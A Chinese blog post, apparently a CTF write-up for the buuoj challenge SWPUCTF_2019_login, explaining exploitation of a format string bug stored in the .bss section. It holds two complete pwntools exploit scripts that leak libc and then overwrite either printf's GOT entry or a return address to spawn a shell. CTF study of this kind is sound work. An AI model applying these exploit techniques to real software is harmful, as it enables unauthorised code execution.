bss上格式化字符串处理【buuoj】SWPUCTF_2019_login

最新推荐文章于 2024-02-26 19:00:35 发布
最新推荐文章于 2024-02-26 19:00:35 发布
阅读量997 收藏 1
点赞数 3
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/119567212
版权

这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。

IDA分析

很明显的格式化字符串漏洞,但是是在bss段上
在这里插入图片描述

总结一下32位格式化字符串在bss段上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图
在这里插入图片描述
通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样
思考一下为什么要这么写:因为一般的格式化字符串可以将地址写到栈上,但是这里在bss上显然是不可能,只能借助辅助工具ebp间接写入到栈上)
我们先修改ebp位置指向80开头的数据,修改为后几位为victim_got,再找到一个80开头的,修改为victim_got+2,接下来同时修改上述两个就可以了,在这里就是先修改ebp位置(第六位)def4结尾(因为这里是80开头,只需要修改后面几位),改def8指针(第10位)修改def4指针的80开头数据后几位为got,之后相同的操作。
在这里插入图片描述
为什么要修改两个,一个是got另外一个是got+2,因为担心一次写不完这么多,分两次写入。但是要注意两次必须是同时,不然再次调用printf会找不到函数。
如果想要修改返回值,要重复上述操作四次,分别控制system和/bin/sh\x00字符串地址写入。这种方法可以在保护全开的时候使用。(也可以泄露PIE基地址)结果如下图
在这里插入图片描述

修改GOT表exp

from LibcSearcher import *
from pwn import *

io=process('./SWPUCTF_2019_login')
elf=ELF('./SWPUCTF_2019_login')
libc=elf.libc
context.log_level='debug'
# cause of using bss-string, we can't write to arbitary address


def fmtsend(addr,place):
    io.recvuntil('Try again!\n')
    payload = '%'+str(addr)+'c'+'%'+str(place)+'$hn'
    print payload
    io.sendline(payload)

def debug():
    gdb.attach(io,"b *0x080485AF")
    io.sendline('aa')

io.sendlineafter('name:','aaa')
payload1='%15$p'
io.sendlineafter('password:',payload1)
io.recvuntil('This is the wrong password: ')
libc_start_main = int(io.recvuntil('\n')[:-1],16)-262
# libc=LibcSearcher('__libc_start_main',libc_start_main)
# libc_base=liba_start_main-libc.dump('__libc_start_main')
libc_base=libc_start_main-libc.sym['__libc_start_main']
print "libc_base----->" + hex(libc_base)
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search("/bin/sh\x00").next()
payload2='%6$p'
io.sendlineafter('Try again!\n',payload2)
io.recvuntil('This is the wrong password: ')
target=int(io.recvuntil('\n')[:-1],16)
print "target----->" + hex(target)
print hex(elf.got['puts'])

heap_base = target-0x28
stack_addr = heap_base+0x2c
stack_addr2=heap_base+0x24
bias1=stack_addr&0xffff
bias2=elf.got['printf']&0xffff
bias3=stack_addr2&0xffff
system_back4=(system&0xffff)
system_for4=(system&0xffff0000)>>16
print hex(bias1)
print hex(bias2)
print hex(system)
print hex(system_for4)
print hex(system_back4)
# pause()



# gdb.attach(io,"b *0x080485AF")
fmtsend(bias1,6)
fmtsend(bias2,10)
fmtsend(bias1-8,6)
fmtsend(bias2+2,10)
payload = '%'+str(system_back4)+'c'+'%'+str(11)+'$hn'+'%'+str(system_for4-system_back4)+'c'+'%'+str(9)+'$hn'
io.recvuntil('Try again!\n')
io.sendline(payload)
io.sendline(';sh')

io.interactive()

修改返回地址exp

from LibcSearcher import *
from pwn import *

io=process('./SWPUCTF_2019_login')
# io=remote('node4.buuoj.cn',27728)
elf=ELF('./SWPUCTF_2019_login')
libc=elf.libc
context.log_level='debug'
# cause of using bss-string, we can't write to arbitary address


def fmtsend(addr,place):
    io.recvuntil('Try again!\n')
    payload = '%'+str(addr)+'c'+'%'+str(place)+'$hn'
    print payload
    io.sendline(payload)

def debug():
    gdb.attach(io,"b *0x080485AF")
    io.sendline('aa')

io.sendlineafter('name:','aaa')
payload1='%15$p'
io.sendlineafter('password:',payload1)
io.recvuntil('This is the wrong password: ')
libc_start_main = int(io.recvuntil('\n')[:-1],16)-262
# libc=LibcSearcher('__libc_start_main',libc_start_main)
# libc_base=liba_start_main-libc.dump('__libc_start_main')
libc_base=libc_start_main-libc.sym['__libc_start_main']
print "libc_base----->" + hex(libc_base)
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search("/bin/sh\x00").next()
payload2='%6$p'
io.sendlineafter('Try again!\n',payload2)
io.recvuntil('This is the wrong password: ')
target=int(io.recvuntil('\n')[:-1],16)
print "target----->" + hex(target)
print hex(elf.got['puts'])
binsh=libc_base+libc.search('/bin/sh\x00').next()

print "system" + hex(system)
system_back4=(system&0xffff)
system_for4=(system&0xffff0000)>>16
binsh_for4=(binsh&0xffff0000)>>16
binsh_back4=binsh&0xffff

heap_base = target-0x28
ret_addr=heap_base+7*4
param_addr=heap_base+9*4
param_addr_4=param_addr&0xffff
ret_addr_4=ret_addr&0xffff

fmtsend(ret_addr_4,6)
fmtsend(system_back4,10)
fmtsend(ret_addr_4+2,6)
fmtsend(system_for4,10)

fmtsend(param_addr_4,6)
fmtsend(binsh_back4,10)
fmtsend(param_addr_4+2,6)
fmtsend(binsh_for4,10)
debug()

io.recvuntil('Try again!\n')
# gdb.attach(io,"b *0x080485DB")
io.sendline('wllmmllw')



io.interactive()

这里没有打远程,因为一开始忘记换libc了,觉得太麻烦
在这里插入图片描述

N1ch0l4s
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【PWN系列】格式化字符串bss段上的处理
Vicl1fe的博客
10-19 1446
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/ 第一次遇到这种题,想写wp记录一下,但确实不知道该怎么写才通俗易懂,最后还是感觉结合exp一步一步调试应该会更通俗易懂。 题目分析 开启
格式化字符串bss段上的处理
playmaker的博客
06-19 2519
格式化字符串bss段上的内容处理 先查看程序保护,保护全开 拿到程序一眼就看到了格式化字符串的漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串bss
qq_41667316的博客
07-13 707
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss段,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
BUUCTF之“SWPUCTF_2019_login
Probeginner的博客
01-01 1101
格式化字符串bss段上的情况:间接修改printf.got表为system,,, ebp对应的地址映射比较关键
BUU-SWPUCTF_2019_login
m0_46204503的博客
12-22 2186
非栈上格式化字符串漏洞 具体原理:由于不在栈上,所以我们可控数据没法写到栈上,也就没有办法变成printf的某个参数 例(buu-SWPUCTF_2019_login) 检查保护,没pie,got可被修改 IDA查看程序,存在格式化字符串漏洞 思路:由于不存在栈溢出,且没有给libc,那么我们的思路就有限了,修改printf的got 问题分析: 首先这是一道32位的非栈上格式化字符串漏洞,那么与普通格式化字符串漏洞相比较有什么区别呢? 首先栈信息泄露是相同的,但是找偏移的话较为不
bss.tar.gz_bss_bss matlab code_in
09-14
An excellent BSS Code in Matlab.
bss.zip_BSS matlab_BSS算法matlab_bss_语音 盲分离
09-21
基于独立分量分析的语音信号盲分离算法,采用matlab编程,程序共593行
PCAT.zip_BSS matlab_PCA BSS MATLAB_bss_pca bss_zip
09-19
PCA algorithm for BSS.
bss.rar_Chebyshev type_bss_iir_切比雪夫_高通滤波器
09-20
IIR数字高通切比雪夫Ⅱ型滤波器幅频与相频曲线 真的很好用 自己完全编写~!
BSS.rar_ICA_bss ica_bss word_ica盲分离
07-14
BSS(盲分离)ICA(独立分量分析)的教程,word版本
SWPUCTF_2019_login
z1r0的博客
03-09 552
SWPUCTF_2019_login 查看保护 格式化字符串漏洞,但是s1和正常的栈上格式化不一样,这里是非栈上。 攻击思路:因为是非栈上,所以需要借助ebp这里的链子来实现将printf_got改为system_addr。 1.首先借助这个格式化漏洞拿到libc和ebp的地址。 2.接下来就是借助ebp这条链子将printf_got改到这个链子上,最后的结构为下图 用%6$hhn来修改%10$处的数据然后%10$hhn来修改%14$处的数据最后使得使得%14$处为printf的GOT表地址,同样的
【Pwn】SWPUCTF_2019_login
Nothing
12-09 1148
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
BUU_SWPUCTF_2019_login非栈上格式化字符串
qq_70452545的博客
04-21 211
对于栈上的格式化字符串可以通过直接将对应地址写入栈中,然后利用三链对任意写入地址修改,非栈上也就是不能直接写入,利用格式化字符串一样可以修改,只是要麻烦一点。
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1642
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
格式化字符串漏洞及利用_萌新食用
蚁景网安学院
06-10 636
Y格式化字符串漏洞及利用前言格式化字符串漏洞 具有 任意地址读,任意地址写。固定布局 ...
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 463
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell。
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 691
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
[CTF]PWN--非栈上格式化字符串漏洞
2301_79880752的博客
02-26 1914
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈上格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
WNM_BSS_TRANS_MGMT_RESP
最新发布
03-15
WNM_BSS_TRANS_MGMT_RESP是无线网络管理(WNM)协议中的一种响应消息。WNM协议是用于在无线局域网(WLAN)中进行网络管理和配置的一种协议。 WNM_BSS_TRANS_MGMT_RESP消息是由接收方向发送方返回的响应消息,用于确认或拒绝发送方发起的BSS(基本服务集)过渡管理请求。BSS过渡管理是指在WLAN中切换到另一个BSS的过程,例如从一个接入点切换到另一个接入点。 WNM_BSS_TRANS_MGMT_RESP消息通常包含以下信息: 1. 状态码:用于指示请求的处理结果,例如成功、失败或其他特定状态。 2. 原因代码:如果请求失败,原因代码可以提供更详细的失败原因。 3. 其他可选字段根据具体实现和需求,可能还包含其他相关信息。 相关问题--: 1. 什么是WNM协议? 2. 什么是BSS过渡管理? 3. WNM_BSS_TRANS_MGMT_RESP消息中的状态码有哪些可能的取值? 4. WNM_BSS_TRANS_MGMT_RESP消息中的原因代码有什么作用?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值